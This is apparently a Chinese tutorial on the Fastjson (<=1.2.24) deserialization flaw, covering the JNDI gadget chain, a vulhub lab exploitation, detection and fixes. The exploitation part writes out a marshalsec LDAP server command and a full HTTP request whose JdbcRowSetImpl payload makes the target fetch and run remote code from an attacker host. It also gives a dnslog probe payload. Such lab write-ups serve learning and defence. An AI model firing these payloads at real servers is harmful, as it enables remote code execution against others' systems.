Fastjson反序列化漏洞

Fastjson反序列化漏洞

一、Fastjson介绍

1、什么是fastjson?

fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。

2、fastjson的优点

  • 速度快
  • 使用广泛
  • 测试完备
  • 使用简单

二、影响范围:

fastjson <= 1.2.24

三、漏洞原理

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

1、JdbcRowSetlmpl类反序列化,调用JdbcRowSetlmpl类的setAutoCommit()函数

2、setAutoCommit()调用connect()

3、connect()调用lookup()连接到LDAP/RMI服务器

4、下载恶意代码到本地,执行,攻击发生

四、漏洞利用

1、先开启vulhub中fastjson靶机

2、开启获取资源的http服务器

3、把恶意的.java文件编译后的.class文件放到http服务器上(需要用jdk1.8版本)

4、开启RMI/LDAP服务(本机的9999端口)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.142.1/#ReverseFile" 9999

5、bp发送payload

POST / HTTP/1.1
Host: 192.168.142.133:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 166

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.142.1:9999/ReverseFile",
        "autoCommit":true
    }
}

五、漏洞发现

1、找到发送json序列化数据的接口

2、判断是否使用fastjson

(1)非法格式报错

{"x":"

(2)使用dnslog探测

{"x":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.com"}}

(3)Burpsuit插件

六、漏洞修复

1、升级JDK

JDK7u21之后:

java.rmi.server.useCodebaseOnly的默认值被设置为True。当该值为true时,将禁用自动加载远程类文件,仅从本地加载文件。

JDK8u121之后:

增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本无法触发该漏洞,但依然可以用LDAP协议来进行JNDI注入攻击。

JDK8u191之后:

com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase选项,把LDAP协议攻击途径也禁用了。

2、升级Fastjson

fastjson.parser.safeMode=true

3、使用安全产品过滤非法内容

4、更换其他序列化工具

Jackson/Gson

热门相关:最强狂兵   重生之至尊千金   战神   夫人你马甲又掉了   重生之至尊千金